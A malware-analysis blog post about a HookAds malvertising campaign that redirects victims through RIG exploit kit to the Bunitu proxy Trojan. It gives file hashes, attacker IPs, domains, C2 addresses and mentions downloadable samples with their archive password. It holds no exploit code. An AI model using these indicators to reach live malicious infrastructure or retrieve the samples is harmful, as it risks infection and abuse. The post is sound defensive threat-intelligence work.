Originally posted at malwarebreakdown.com
Follow me on Twitter
The HookAds campaign recently became active after disappearing near the end of 2017. Last week I wrote about it coming back and delivering Bunitu proxy Trojan. This post will go over the infection chain found on 03/11/18.
HTTP traffic:
The decoy site contains some packed JavaScript:
The Base64 string shown above is decoded and the output is used in the iframe, causing the following GET request:
The server responds with a 301 Moved Permanently pointing to the directory /ywkk/. The request for /ywkk/ returns the pre-landing page with more packed JavaScript:
The pre-landing page filters out unwanted traffic and displays a page showing “404 Not Found”:
Victims that are redirected to the RIG EK landing page are delivered the Bunitu proxy Trojan.
Hashes
SHA256: 0078ea2e505149a864958511f5a3f733482f8e92639a713807095d8f7a7e7fe8
File name: Pre-Landing Page.txt
SHA256: 6b46ba8d4a4ca55d7fc6781d3a53f5a2b8a2da682bc4b09624ed0e13779b7b46
File name: RIG EK Landing Page.txt
SHA256: 85c5f5a81f6701d597ada200dfd8338078752dc165f97efc094edf4874327c76
File name: RIG EK Flash Exploit.swf
SHA256: 94b882dedcaf288a9bda752767dc65d39cd15f5da4e5615c8fae3f962c806d41
File name: u32.tmp
SHA256: c669bccbd709080fc78d5931afc7337977cd4c5c94c4900052c665a533c53b71
File name: b43.exe
Hybrid-Analysis Report
Any Run Report
SHA256: 9dec506410d00e17a843f13f24241420b83ab815421b19277a620992ce3e63c4
File name: osetril.dll
Hybrid-Analysis Report
IOCs
HTTP Traffic:
88.198.94.53 – 53hshshshs1.info – GET /ywkk – HookAds Redirect
188.225.33.138 – POST and GET – RIG EK IP-Literal Hostname
DNS Queries and Responses:
n.paratozix.net – 63.23.10.118
k.paratozix.net – 4.171.174.235
From HA Reports – “CrowdStrike Bunitu Proxy C2 Registration 1”:
216.58.206.79:443
62.212.66.85:443
Samples
Password is “infected”
Article Link: https://malwarebreakdown.com/2018/03/12/hookads-campaign-delivers-bunitu-proxy-trojan-via-rig-ek/